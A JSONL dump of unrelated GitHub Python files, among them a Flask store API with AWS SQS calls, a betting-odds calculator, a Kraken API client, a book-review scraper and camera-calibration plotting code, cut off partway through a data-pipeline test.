f.create_dataset(\"params\", data=flattened_params.detach().cpu().numpy())\n f.create_dataset(\"class_id\", data=class_id.detach().cpu().numpy())\n if split == \"train\":\n f.create_dataset(\"coords\", data=crd.detach().cpu().numpy())\n f.create_dataset(\"labels\", data=lbl.detach().cpu().numpy())\n\n global_idx += 1\n\n\n@hmain(base_cfg_dir=\"cfg/bases\", template_cfg_file=\"cfg/inrs_dataset.yaml\", create_out_dir=False)\ndef main() -> None:\n dset_creator = InrsDatasetCreator()\n dset_creator.create_dataset()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"CVLAB-Unibo/inr2vec","sub_path":"mesh_classification/create_inrs_dataset.py","file_name":"create_inrs_dataset.py","file_ext":"py","file_size_in_byte":7376,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"51"} +{"seq_id":"13799047523","text":"from dotenv import load_dotenv, find_dotenv, set_key, unset_key, dotenv_values\n\nenv_path = find_dotenv()\nload_dotenv(env_path)\n\ndef set_variable(env_name, value):\n set_key(env_path, f\"export {env_name.upper()}\", str(value))\n print(f\"Environment Variable set\\n{env_name.upper()}={str(value)}\\n at {env_path}\")\n\n\nwhile True:\n option = input(\"\\n[1] Change environment config (Prod, Dev) or \\n[2] Add custom environment varibale\\n\")\n if option == str(1):\n while True:\n value = input(f\"\\nWhat config to select?\\n[1] Development\\n[2] Production\\n\")\n print(dotenv_values())\n if value == str(1):\n unset_key(env_path, f\"APP_SETTINGS\")\n set_variable(\"APP_SETTINGS\", \"config.DevelopmentConfig\")\n break\n elif value == str(2):\n unset_key(env_path, f\"APP_SETTINGS\")\n set_variable(\"APP_SETTINGS\", 
\"config.ProductionConfig\")\n break\n else:\n print(\"Invalid choice, try 1 or 2\")\n break\n elif option == str(2):\n env_name = input(\"What is the name of your environment variable?\\n\")\n value = input(f\"\\nWhat is the value to set for {env_name}\\n\")\n unset_key(env_path, env_name)\n set_variable(env_name, value)\n break\n else:\n print(\"Invalid choice, try 1 or 2\")\n","repo_name":"rishFilet/flask_upload_files","sub_path":"set_environment.py","file_name":"set_environment.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"39675139490","text":"#Escreva um programa que leia um conjunto de 10 números inteiros. Calcule e mostre:\n#a)o menor número\n#b)a soma dos números pares e maiores que 10\n#c)a quantidade de números ímpares\n#d)a média dos números maiores que 20\n\nsoma = 0\nmedia = 0\ncontador = 0\nimpares = 0\nlista = []\n\nfor i in range(10):\n numero = int(input(\"Digite um número: \"))\n\n lista.append(numero)\n\n if numero > 10 and numero % 2 == 0:\n soma = soma + numero\n if numero % 2 != 0:\n impares = impares+1\n if numero > 20:\n contador = contador+1\n\n media = media + numero\n\nprint(lista)\nprint(\"O menor número da sua lista: \", min(lista))\nprint(\"A soma dos números pares e maiores que 10: \", soma)\nprint(\"A quantidade de números ímpares: \", impar)\nprint(\"A media dos números maiores que 20 eh: \", media/contador)\n","repo_name":"sandroschutt/Python","sub_path":"listasLP/lista_01/exercicio_01.py","file_name":"exercicio_01.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"20935679388","text":"import os\n\nfrom flask import Flask, jsonify, request\nfrom flasgger import Swagger, LazyString, LazyJSONEncoder\nfrom flasgger import swag_from\nimport boto3, json\n\napp = Flask(__name__)\nstores = [\n {\n 'name': 'Flower_store',\n 'items': [\n {\n 'name': 'Roses',\n 'price': 100\n }\n ]\n },\n {\n 'name': 'Books_store',\n 'items': [\n {\n 'name': 'Python Programming',\n 'price': 100\n }\n ]\n }\n]\n\napp.json = LazyJSONEncoder\n\n\nswagger_template = dict(\ninfo = {\n 'title': LazyString(lambda: 'Swagger File for Our Store'),\n 'version': LazyString(lambda: '0.1'),\n 'description': LazyString(lambda: 'This document depicts a sample Swagger UI document and implements Store'\n 'functionality after executing GET and POST methods'),\n },\n host = LazyString(lambda: request.host)\n)\n\n\nswagger_config = {\n \"headers\": [],\n \"specs\": [\n {\n \"endpoint\": 'store',\n \"route\": '/store.json',\n \"rule_filter\": lambda rule: True,\n \"model_filter\": lambda tag: True,\n }\n ],\n \"static_url_path\": \"/flasgger_static\",\n \"swagger_ui\": True,\n \"specs_route\": \"/storeapi/\"\n}\n\nswagger = Swagger(app, template=swagger_template,\n config=swagger_config)\n@swag_from(\"store.yml\", methods=['GET','POST'])\n\n@app.route('/')\ndef home():\n return \"Welcome to Store_Api\"\n\n\n@app.route('/store', methods=['POST'])\ndef create_store():\n request_data = request.get_json()\n new_store = {\n 'name': request_data['name'],\n 'items': []\n }\n stores.append(new_store)\n return jsonify(new_store)\n\n\n@app.route('/store/')\ndef get_store_name(name):\n for store in stores:\n if(store['name'] == name):\n return jsonify(store)\n return jsonify({'message': 'store not found'})\n\n\n@app.route('/store')\ndef get_all_store_name():\n return jsonify({'stores': 
\n@app.route('/store')\ndef get_all_store_name():\n return jsonify({'stores': stores})\n\n\n@app.route('/store/<string:name>/item', methods=['POST'])\ndef create_store_item(name):\n request_data = request.get_json()\n for store in stores:\n if(store['name'] == name):\n new_item = {\n 'name': request_data['name'],\n 'price': request_data['price']\n }\n store['items'].append(new_item)\n return jsonify(new_item)\n return jsonify({'message':'store not found'})\n\n\n@app.route('/store/<string:name>/item')\ndef get_store_item(name):\n for store in stores:\n if(store['name'] == name):\n return jsonify(store['items'])\n return jsonify({'message': 'store not found'})\n\n\n\n\nsqs = boto3.resource('sqs', region_name='ap-south-1')\nqueue = sqs.create_queue(QueueName='Storequeue', Attributes={'DelaySeconds': '10', 'VisibilityTimeout': '30'})\nqueue2 = sqs.get_queue_by_name(QueueName='Storequeue')\nprint(queue2.attributes)\nresponse = queue.send_message(MessageBody='Hey, Welcome to the store')\nprint(response.get('MessageId'))\nprint(response.get('MD5OfMessageBody'))\nregion_name = 'ap-south-1'\nqueue_name = 'Storequeue'\nmax_queue_messages = 10\nmessage_bodies = []\n# aws_access_key_id = ''\n# aws_secret_access_key = ''\n# client = boto3.client('sqs', aws_access_key_id=ACCESS_KEY, aws_secret_access_key=SECRET_KEY)\n\nsession = boto3.Session(region_name='ap-south-1', aws_access_key_id=os.environ.get('aws_access_key_id'), aws_secret_access_key=os.environ.get('aws_secret_access_key'))\nec2 = session.client('sqs')\n\n\n# sqs = boto3.resource('sqs', region_name=region_name,\n# aws_access_key_id=ACCESS_KEY,\n# aws_secret_access_key=SECRET_KEY)\n\nqueue = sqs.get_queue_by_name(QueueName=queue_name)\n\napp.run(port=9090)","repo_name":"ChaitanyaDevnikar/Store_api","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"47041411281","text":"# from colorama import init, Fore, Back, Style\n#\n# init()\n\n\n\n\n\n\ndef outWhite(text):\n print(\"\\033[37m {}\" .format(text))\n\n\ndef outTurquoise (text):\n print(\"\\033[36m {}\" .format(text))\n\n\ndef out_blue(text):\n print(\"\\033[34m {}\" .format(text))\n\n\n\nlist_password = ['fcgo54lk', 'lfsd432l3821p']
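\r\n\r\n# Worked example (hypothetical odds): with coefficient_1 = 2.2, coefficient_2 = 2.3\r\n# and totalAmount = 100, the loop in calculationOfCoefficients keeps only splits\r\n# where rate_1 * 2.2 >= 100 and rate_2 * 2.3 >= 100; e.g. rate_1 = 50, rate_2 = 50\r\n# pays out 110 or 115, so either outcome returns more than the total stake.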
\r\n\r\nprint('\\n\\n-------START-------\\n')\r\n\r\nuser_password = input('Enter the password\\n')\r\n\r\n\r\n\r\n\r\n\r\ndef calculationOfCoefficients(choise):\r\n global listRate_1\r\n global listRate_2\r\n count = 0\r\n\r\n for n in range(totalAmount):\r\n rate_1 = totalAmount - n\r\n rate_2 = totalAmount - rate_1\r\n overallResult_1 = rate_1 * coefficient_1\r\n overallResult_2 = rate_2 * coefficient_2\r\n total_1 = overallResult_1 - totalAmount\r\n total_2 = overallResult_2 - totalAmount\r\n if overallResult_1 < totalAmount or overallResult_2 < totalAmount:\r\n continue\r\n\r\n listRate_1.append(rate_1)\r\n listRate_2.append(rate_2)\r\n listTotal_1.append(total_1)\r\n listTotal_2.append(total_2)\r\n listOverallResult_1.append(overallResult_1)\r\n listOverallResult_2.append(overallResult_2)\r\n if choise == 0:\r\n count += 1\r\n print('Your winnings on the first outcome -', total_1, 'RUB, ', 'Your winnings on the second outcome -', total_2, 'RUB')\r\n print('Total funds for the first outcome', overallResult_1, 'Total funds for the second outcome', overallResult_2, '\\nStake on the first outcome', rate_1,\r\n 'Stake on the second outcome', rate_2, '\\n')\r\n print('Total combinations: {}'.format(count))\r\n\r\n\r\n\r\nstate_user = 0\r\n\r\n\r\n\r\nwhile True:\r\n\r\n\r\n if user_password in list_password:\r\n print('Account confirmed!\\n')\r\n else:\r\n print('Wrong password\\n')\r\n break\r\n\r\n coefficient_1 = float(input('Enter the odds for the first team '))\r\n coefficient_2 = float(input('Enter the odds for the second team '))\r\n totalAmount = int(input('What amount do you want to stake? '))\r\n\r\n\r\n listRate_1 = []\r\n listRate_2 = []\r\n listTotal_1, listTotal_2 = [], []\r\n listOverallResult_1, listOverallResult_2 = [], []\r\n\r\n\r\n\r\n\r\n choiceUser = int(input('What do you want to know? \\n'\r\n '0. Show the result of every possible combination \\n'\r\n '1. Show the result of the first stake \\n'\r\n '2. Show the result of the second stake \\n'\r\n '3. Show the average result \\n'\r\n '4. Show all combinations \\n'\r\n 'Enter a number '))\r\n\r\n calculationOfCoefficients(choiceUser)\r\n\r\n # the \"average\" option reads the middle element of each list, so these\r\n # indices are computed only after the lists above have been filled\r\n valRate_1 = len(listRate_1) // 2\r\n valTotal_1 = len(listTotal_1) // 2\r\n valOverallResult_1 = len(listOverallResult_1) // 2\r\n valRate_2 = len(listRate_2) // 2\r\n valTotal_2 = len(listTotal_2) // 2\r\n valOverallResult_2 = len(listOverallResult_2) // 2\r\n\r\n\r\n if choiceUser == 1:\r\n print('\\nResult of the first stake \\n'\r\n 'Win for the first team: \\n'\r\n 'Stake:', listRate_1[0], '\\n'\r\n 'Winnings:', listTotal_1[0], '\\n'\r\n 'Final result:', listOverallResult_1[0], '\\n'\r\n '\\nWin for the second team: \\n'\r\n 'Stake:', listRate_2[0], '\\n'\r\n 'Winnings:', listTotal_2[0], '\\n'\r\n 'Final result:', listOverallResult_2[0], '\\n'\r\n )\r\n\r\n if choiceUser == 2:\r\n print('\\nResult of the second stake \\n'\r\n 'Win for the first team: \\n'\r\n 'Stake:', listRate_1[-1], '\\n'\r\n 'Winnings:', listTotal_1[-1], '\\n'\r\n 'Final result:', listOverallResult_1[-1], '\\n'\r\n '\\nWin for the second team: \\n'\r\n 'Stake:', listRate_2[-1], '\\n'\r\n 'Winnings:', listTotal_2[-1], '\\n'\r\n 'Final result:', listOverallResult_2[-1], '\\n'\r\n )\r\n\r\n\r\n if choiceUser == 3:\r\n print('\\nAverage result: \\n'\r\n 'Win for the first team: \\n'\r\n 'Stake:', listRate_1[valRate_1], '\\n'\r\n 'Winnings:', listTotal_1[valTotal_1], '\\n'\r\n 'Final result:', listOverallResult_1[valOverallResult_1], '\\n'\r\n '\\nWin for the second team: \\n'\r\n 'Stake:', listRate_2[valRate_2], '\\n'\r\n 'Winnings:', listTotal_2[valTotal_2], '\\n'\r\n 'Final result:', listOverallResult_2[valOverallResult_2], '\\n'\r\n )\r\n\r\n if choiceUser == 4:\r\n print('\\nFocus on the first outcome {} \\n'\r\n 'Win for the first team: \\n'\r\n 'Stake:', listRate_1[0], '\\n'\r\n 'Winnings:', listTotal_1[0], '\\n'\r\n 'Total funds:', listOverallResult_1[0], '\\n'\r\n '\\nWin for the second team: \\n'\r\n 'Stake:', listRate_2[0], '\\n'\r\n 'Winnings:', listTotal_2[0], '\\n'\r\n 'Total funds:', listOverallResult_2[0], '\\n'\r\n '\\n\\nFocus on the second outcome{} \\n'\r\n 'Win for the first team: \\n'\r\n 'Stake:', listRate_1[-1], '\\n'\r\n 'Winnings:', listTotal_1[-1], '\\n'\r\n 'Total funds:', listOverallResult_1[-1], '\\n'\r\n '\\nWin for the second team: \\n'\r\n 'Stake:', listRate_2[-1], '\\n'\r\n 'Winnings:', listTotal_2[-1], '\\n'\r\n 'Total funds:', listOverallResult_2[-1], '\\n'\r\n '\\n\\nAverage result: \\n'\r\n 'Win for the first team: \\n'\r\n 'Stake:', listRate_1[valRate_1], '\\n'\r\n 'Winnings:', listTotal_1[valTotal_1], '\\n'\r\n 'Total funds:', listOverallResult_1[valOverallResult_1], '\\n'\r\n '\\nWin for the second team: \\n'\r\n 'Stake:', listRate_2[valRate_2], '\\n'\r\n 'Winnings:', listTotal_2[valTotal_2], '\\n'\r\n 'Total funds:', listOverallResult_2[valOverallResult_2], '\\n'\r\n )\r\n user_exit = int(input('Place another bet?\\n'\r\n '1.One more time!\\n2.Exit '))\r\n if user_exit == 2:\r\n print('\\n\\n------Bye Bye------')\r\n break\r\n\r\n\r\n\r\n# If anyone has read this far and realized how rough the design is, you have\r\n# my sympathy; I originally wrote this code not for the public and did not try very hard. 
Thanks for understanding!","repo_name":"Trigger0fficial/forecast_V1","sub_path":"forecast/v1.py","file_name":"v1.py","file_ext":"py","file_size_in_byte":8076,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"15630679363","text":"from typing import Any, Dict, Optional, Union\n\nimport httpx\n\nfrom ...client import Client\nfrom ...models.get_asset_info_response_200 import GetAssetInfoResponse200\nfrom ...types import UNSET, Response, Unset\n\n\ndef _get_kwargs(\n *,\n client: Client,\n asset: Union[Unset, None, str] = UNSET,\n aclass: Union[Unset, None, str] = UNSET,\n) -> Dict[str, Any]:\n url = \"{}/public/Assets\".format(client.base_url)\n\n headers: Dict[str, str] = client.get_headers()\n cookies: Dict[str, Any] = client.get_cookies()\n\n params: Dict[str, Any] = {}\n params[\"asset\"] = asset\n\n params[\"aclass\"] = aclass\n\n params = {k: v for k, v in params.items() if v is not UNSET and v is not None}\n\n return {\n \"method\": \"get\",\n \"url\": url,\n \"headers\": headers,\n \"cookies\": cookies,\n \"timeout\": client.get_timeout(),\n \"params\": params,\n }\n\n\ndef _parse_response(*, response: httpx.Response) -> Optional[GetAssetInfoResponse200]:\n if response.status_code == 200:\n response_200 = GetAssetInfoResponse200.from_dict(response.json())\n\n return response_200\n return None\n\n\ndef _build_response(*, response: httpx.Response) -> Response[GetAssetInfoResponse200]:\n return Response(\n status_code=response.status_code,\n content=response.content,\n headers=response.headers,\n parsed=_parse_response(response=response),\n )\n\n\ndef sync_detailed(\n *,\n client: Client,\n asset: Union[Unset, None, str] = UNSET,\n aclass: Union[Unset, None, str] = UNSET,\n) -> Response[GetAssetInfoResponse200]:\n \"\"\"Get Asset Info\n\n Get information about the assets that are available for deposit, withdrawal, trading and staking.\n\n Args:\n asset (Union[Unset, None, str]):\n aclass (Union[Unset, None, str]):\n\n Returns:\n Response[GetAssetInfoResponse200]\n \"\"\"\n\n kwargs = _get_kwargs(\n client=client,\n asset=asset,\n aclass=aclass,\n )\n\n response = httpx.request(\n verify=client.verify_ssl,\n **kwargs,\n )\n\n return _build_response(response=response)\n\n\ndef sync(\n *,\n client: Client,\n asset: Union[Unset, None, str] = UNSET,\n aclass: Union[Unset, None, str] = UNSET,\n) -> Optional[GetAssetInfoResponse200]:\n \"\"\"Get Asset Info\n\n Get information about the assets that are available for deposit, withdrawal, trading and staking.\n\n Args:\n asset (Union[Unset, None, str]):\n aclass (Union[Unset, None, str]):\n\n Returns:\n Response[GetAssetInfoResponse200]\n \"\"\"\n\n return sync_detailed(\n client=client,\n asset=asset,\n aclass=aclass,\n ).parsed\n\n\nasync def asyncio_detailed(\n *,\n client: Client,\n asset: Union[Unset, None, str] = UNSET,\n aclass: Union[Unset, None, str] = UNSET,\n) -> Response[GetAssetInfoResponse200]:\n \"\"\"Get Asset Info\n\n Get information about the assets that are available for deposit, withdrawal, trading and staking.\n\n Args:\n asset (Union[Unset, None, str]):\n aclass (Union[Unset, None, str]):\n\n Returns:\n Response[GetAssetInfoResponse200]\n \"\"\"\n\n kwargs = _get_kwargs(\n client=client,\n asset=asset,\n aclass=aclass,\n )\n\n async with httpx.AsyncClient(verify=client.verify_ssl) as _client:\n response = await _client.request(**kwargs)\n\n return _build_response(response=response)\n
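\n\n# Usage sketch (the Kraken base URL and asset codes below are assumptions):\n# client = Client(base_url=\"https://api.kraken.com/0\")\n# info = sync(client=client, asset=\"XBT,ETH\", aclass=\"currency\")\n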
\n\nasync def asyncio(\n *,\n client: Client,\n asset: Union[Unset, None, str] = UNSET,\n aclass: Union[Unset, None, str] = UNSET,\n) -> Optional[GetAssetInfoResponse200]:\n \"\"\"Get Asset Info\n\n Get information about the assets that are available for deposit, withdrawal, trading and staking.\n\n Args:\n asset (Union[Unset, None, str]):\n aclass (Union[Unset, None, str]):\n\n Returns:\n Response[GetAssetInfoResponse200]\n \"\"\"\n\n return (\n await asyncio_detailed(\n client=client,\n asset=asset,\n aclass=aclass,\n )\n ).parsed\n","repo_name":"jaggas/pykraken","sub_path":"pykraken/rest_api_client/api/market_data/get_asset_info.py","file_name":"get_asset_info.py","file_ext":"py","file_size_in_byte":4010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"40506290314","text":"\"\"\"\nUtility functions\n\"\"\"\nimport asyncio\nimport functools\nimport threading\nfrom tqdm import tqdm\nfrom . import runners\n\n\ndef watchdog(afunc):\n \"\"\"Stops all tasks if there is an error\"\"\"\n\n @functools.wraps(afunc)\n async def run(*args, **kwargs):\n try:\n await afunc(*args, **kwargs)\n except asyncio.CancelledError:\n return\n except Exception as err:\n print(f\"exception {err}\")\n asyncio.get_event_loop().stop()\n\n return run\n\n\ndef get_or_create_eventloop():\n try:\n return asyncio.get_event_loop()\n except RuntimeError as ex:\n if \"There is no current event loop in thread\" in str(ex):\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n return asyncio.get_event_loop()\n\n\nclass RunThread(threading.Thread):\n def __init__(self, func, args, kwargs):\n self.func = func\n self.args = args\n self.kwargs = kwargs\n super().__init__()\n\n def run(self):\n self.result = runners.run(self.func(*self.args, **self.kwargs))\n\n\ndef run_async(func, *args, **kwargs):\n \"\"\"async wrapper to detect if asyncio loop is already running\n\n This is useful when already running in async thread.\n \"\"\"\n try:\n loop = get_or_create_eventloop()\n except RuntimeError:\n loop = None\n if loop and loop.is_running():\n thread = RunThread(func, args, kwargs)\n thread.start()\n thread.join()\n return thread.result\n else:\n return runners.run(func(*args, **kwargs))\n","repo_name":"plantnet/gbif-dl","sub_path":"gbif_dl/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"51"}
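A minimal sketch of the run_async helper in the record above; the async function and URL are illustrative:

    from gbif_dl.utils import run_async

    async def fetch(url):
        # stand-in for real async work (e.g. an HTTP request)
        return url

    print(run_async(fetch, "https://api.gbif.org/v1"))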
print(response.text)\n        soup = BeautifulSoup(response.text, 'lxml')\n        items = soup.find_all(class_=\"footer-card__link\", href=True)\n        href = []\n        for item in items:\n            href.append(item.get('href'))\n        print(href)\n        # Open the page and parse all the links to the full reviews.\n        time.sleep(random.randint(10, 15))\n        for i in range(len(href)):\n            sec_response = requests.get(second_url + href[i])\n            sec_response.encoding = \"utf-8\"\n            sec_soup = BeautifulSoup(sec_response.text, 'lxml')\n            quotes = sec_soup.find_all(class_=\"lenta-card__mymark\")  # find everything we need and store it\n            names = sec_soup.find_all(class_=\"lenta-card__book-title\")\n            texts = sec_soup.find_all(\"div\", {\"id\": \"lenta-card__text-review-full\"})\n            authors = sec_soup.find_all(class_=\"lenta-card__author\")\n            new_quotes = []\n            for quote in quotes:\n                new_quotes.append(str((quote.text.replace(\" \", \"\")).replace(\"\\n\", \"\")))\n            # open each review and take all the data we need from it\n            # print(str(len(new_quotes)) + \" \" + str(len(names))+\" \"+str(len(texts))+\" \"+str(len(authors)))\n            # number of items found: we use the minimum over the found elements rather than the\n            # number of links, since a review can be missing its rating or author..\n            y = min(len(authors), len(names), len(texts), len(new_quotes))\n            if y == 0:\n                continue\n            print(i, y, len(authors), len(names), len(texts), new_quotes)\n            x = float(new_quotes[0])\n            # Sort the reviews by rating and write them to a txt file; 'w+' means write and read (mode)\n            if 4.5 <= x <= 5:\n                quotes_5 = quotes_5 + 1\n                if quotes_5 >= 1000:\n                    continue\n                namefile = str(quotes_5).zfill(4)\n                with open(\"dataset/\" + \"5\" + '/' + namefile + '.txt', 'w+', encoding=\"utf-8\") as file:\n                    file.write('Rating: ' + str(x) + '\\n' + 'Title: ' + names[0].text + '\\n' + 'Book author: ' +\n                               authors[0].text + '\\n' + 'Review:' + '\\n' + texts[0].text)\n                number_elem = number_elem + 1\n            elif 3.5 <= x < 4.5:\n                quotes_4 = quotes_4 + 1\n                if quotes_4 >= 1000:\n                    continue\n                namefile = str(quotes_4).zfill(4)\n                with open(\"dataset/\" + \"4\" + '/' + namefile + '.txt', 'w+', encoding=\"utf-8\") as file:\n                    file.write('Rating: ' + str(x) + '\\n' + 'Title: ' + names[0].text + '\\n' + 'Book author: ' +\n                               authors[0].text + '\\n' + 'Review:' + '\\n' + texts[0].text)\n                number_elem = number_elem + 1\n            elif 2.5 <= x < 3.5:\n                quotes_3 = quotes_3 + 1\n                if quotes_3 >= 1000:\n                    continue\n                namefile = str(quotes_3).zfill(4)\n                with open(\"dataset/\" + \"3\" + '/' + namefile + '.txt', 'w+', encoding=\"utf-8\") as file:\n                    file.write('Rating: ' + str(x) + '\\n' + 'Title: ' + names[0].text + '\\n' + 'Book author: ' +\n                               authors[0].text + '\\n' + 'Review:' + '\\n' + texts[0].text)\n                number_elem = number_elem + 1\n            elif 1.5 <= x < 2.5:\n                quotes_2 = quotes_2 + 1\n                if quotes_2 >= 1000:\n                    continue\n                namefile = str(quotes_2).zfill(4)\n                with open(\"dataset/\" + \"2\" + '/' + namefile + '.txt', 'w+', encoding=\"utf-8\") as file:\n                    file.write('Rating: ' + str(x) + '\\n' + 'Title: ' + names[0].text + '\\n' + 'Book author: ' +\n                               authors[0].text + '\\n' + 'Review:' + '\\n' + texts[0].text)\n                number_elem = number_elem + 1\n            else:\n                quotes_1 = quotes_1 + 1\n                if quotes_1 >= 1000:\n                    continue\n                namefile = str(quotes_1).zfill(4)\n                with open(\"dataset/\" + \"1\" + '/' + namefile + '.txt', 'w+', encoding=\"utf-8\") as file:\n                    file.write('Rating: ' + str(x) + '\\n' + 'Title: ' + names[0].text + '\\n' + 'Book author: ' +\n                               authors[0].text + '\\n' + 'Review:' + '\\n' + texts[0].text)\n                number_elem = number_elem + 1\n            
#time.sleep(random.randint(55, 60))\n            # increment the counter\n        # # waiting mode so we don't get banned\n        number_page = number_page + 1  # Increment the page counter and flip to the next page, then everything starts over\n        url = 'https://www.livelib.ru/reviews' + '~' + str(number_page) + '#reviews'\n        # And so on, 5000 times :)\n\n\nif __name__ == \"__main__\":  # run main\n    main()\n","repo_name":"Colnuwko/Laba_python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6928,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35113631053","text":"from pathlib import Path\nfrom typing import Callable, Tuple, Union\n\nimport torch\nfrom matplotlib import pyplot as plt\nfrom torch import Tensor\n\nfrom .polyfit import polyval\n\n\nclass Scatter:\n    '''\n    Helper class for scatter plots of image points and reprojected points\n    '''\n\n    def __init__(self, title: str, num_plots: int, dim: int = None):\n        import math\n        cols = int(math.ceil(math.sqrt(num_plots)))\n        rows = int(math.ceil(num_plots / cols))\n        self.fig, ax = plt.subplots(\n            rows, cols, squeeze=False, figsize=(12, 12))\n        plt.suptitle(title)\n        ax = ax.flatten()\n        for i in range(num_plots, rows * cols):\n            ax[i].axis('off')\n        self.ax = ax[:num_plots]\n        for a in self.ax:\n            a.axis('equal')\n            a.grid(True)\n        if dim is not None:\n            from matplotlib.patches import Rectangle\n            for a in self.ax:\n                a.add_patch(Rectangle((-dim, -dim), 2 *\n                                      dim, 2 * dim, fill=False))\n\n    def imshow(self, images: Tensor, image_shape: Tuple[int]) -> None:\n        '''\n        Show images with arbitrary resolution matched to `image_shape`\n        '''\n        self.fig.subplots_adjust(0.01, 0.01, 0.99, 0.90, 0.0, 0.0)\n        H, W = image_shape\n        for a, i in zip(self.ax, images):\n            a.imshow(i, extent=(-0.5, W - 0.5, H - 0.5, -0.5))\n            a.axis('off')\n\n    def __call__(self, points: Tensor, **kwargs):\n        '''\n        Scatter plot given points\n        '''\n        for a, p in zip(self.ax, points):\n            a.scatter(p[:, 0], p[:, 1], **kwargs)\n\n    def show(self) -> None:\n        '''\n        Show the plot\n        '''\n        plt.show()\n\n    def save(self, filepath: Union[str, Path], *args, **kwargs):\n        '''\n        Save the figure to `filepath`\n        '''\n        self.fig.savefig(filepath, *args, **kwargs)\n\n    def clear(self) -> None:\n        '''\n        Clear all axes\n        '''\n        for a in self.ax:\n            a.clear()\n\n    def close(self) -> None:\n        '''\n        Close the figure\n        '''\n        plt.close(self.fig)\n\n\ndef plot_rz_curve(r_max: float, poly: Tensor, norm: float,\n                  num_points: int = 100,\n                  xlabel: str = None, ylabel: str = None,\n                  f_ideal: Callable[[Tensor], Tensor] = None) -> plt.Figure:\n    '''\n    Plots the radius (image points) over `z` coordinate\n    Radius is the length of the `(x, y)` vector\n    `(x, y, z)` forms the view vector into the view coordinate system\n    '''\n    x = torch.linspace(0, r_max, num_points).to(poly)\n    y = polyval(x, poly)\n    fig = plt.figure()\n    plt.plot(x / norm, y / norm, color='r', label='calibrated')\n    if f_ideal is not None:\n        plt.plot(x / norm, f_ideal(x) / norm, color='g', label='ideal')\n    plt.grid(True)\n    plt.axis('equal')\n    plt.xlabel(xlabel or 'Radius in relative coordinates')\n    plt.ylabel(ylabel or 'Z in relative coordinates')\n    plt.legend()\n    return fig\n\n\ndef plot_thetar_curve(theta_max: float, poly: Tensor, norm: float,\n                      num_points: int = 100,\n                      xlabel: str = None, ylabel: str = None,\n                      f_ideal: Callable[[Tensor], Tensor] = None) \\\n        -> plt.Figure:\n    '''\n    Plots the incident angle `theta` over the radius\n    Given a view vector `(x, y, z)`, `theta` is the angle between\n    this vector and `(0, 0, 1)`\n    Radius is the 
length of the `(x, y)` vector\n '''\n x = torch.linspace(0, theta_max, num_points).to(poly)\n y = polyval(x, poly) / norm\n fig = plt.figure()\n plt.plot(x, y, color='r', label='calibrated')\n if f_ideal is not None:\n plt.plot(x, f_ideal(x) / norm, color='g', label='ideal')\n plt.grid(True)\n plt.axis('equal')\n plt.xlabel(xlabel or 'Incident angle in radian')\n plt.ylabel(ylabel or 'Radius in relative coordinates')\n plt.legend()\n return fig\n","repo_name":"tasptz/py-omnicalib","sub_path":"omnicalib/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":3931,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"51"} +{"seq_id":"16476531071","text":"from __future__ import absolute_import\nfrom __future__ import unicode_literals\n\nfrom collections import defaultdict\n\nimport mock\nimport pytest\n\nfrom data_pipeline._position_data_tracker import PositionDataTracker\nfrom data_pipeline.message import CreateMessage\nfrom data_pipeline.schematizer_clientlib.models.avro_schema import AvroSchema\nfrom data_pipeline.schematizer_clientlib.models.topic import Topic\nfrom data_pipeline.schematizer_clientlib.schematizer import SchematizerClient\nfrom tests.helpers.config import reconfigure\n\n\nclass BasePositionDataTrackerTest(object):\n\n @pytest.yield_fixture(scope=\"module\", autouse=True)\n def patch_contains_pii(self):\n mock_date = '2015-01-01'\n mock_topic = Topic(\n 1, str('my-topic'), None, False, 'datapipe', [], mock_date, mock_date\n )\n mock_schema = AvroSchema(\n 1, 'schema', mock_topic, None, 'RW', None, None, mock_date, mock_date\n )\n mock_schematizer_client = mock.Mock(spec=SchematizerClient)\n with mock.patch(\n 'data_pipeline.schematizer_clientlib.schematizer.SchematizerClient',\n return_value=mock_schematizer_client\n ), mock.patch.object(\n mock_schematizer_client,\n 'get_schema_by_id',\n return_value=mock_schema\n ), mock.patch.object(\n mock_schematizer_client,\n 'get_meta_attributes_by_schema_id',\n return_value=[]\n ):\n yield\n\n @property\n def valid_message_data(self):\n return {\n 'schema_id': 123,\n 'payload': bytes(10)\n }\n\n @property\n def topic(self):\n return str('my-topic')\n\n def test_merged_upstream_position_info_map(self, tracker):\n other_topic = str('other-topic')\n self._publish_messages(tracker, [\n self._create_message_with_offsets({0: 10}),\n self._create_message(upstream_position_info=None),\n self._create_message_with_offsets({1: 14}),\n self._create_message_with_offsets({0: 18}),\n self._create_message_with_offsets({2: 20}),\n self._create_message_with_offsets({0: 42}, topic=other_topic)\n ])\n position_data = tracker.get_position_data().merged_upstream_position_info_map\n expected_position_data = {\n self.topic: {0: 18, 1: 14, 2: 20},\n other_topic: {0: 42}\n }\n assert position_data == expected_position_data\n\n def _publish_messages(self, tracker, messages):\n messages_published = defaultdict(int)\n for message in messages:\n tracker.record_message_buffered(message)\n messages_published[message.topic] += 1\n\n for topic, count in messages_published.iteritems():\n tracker.record_messages_published(topic, 0, count)\n\n def _create_message(self, **kwargs):\n message_data = self.valid_message_data\n message_data.update(kwargs)\n return CreateMessage(**message_data)\n\n def _create_message_with_offsets(self, offsets, topic=None):\n if topic is None:\n topic = self.topic\n return self._create_message(upstream_position_info={topic: offsets})\n\n\nclass 
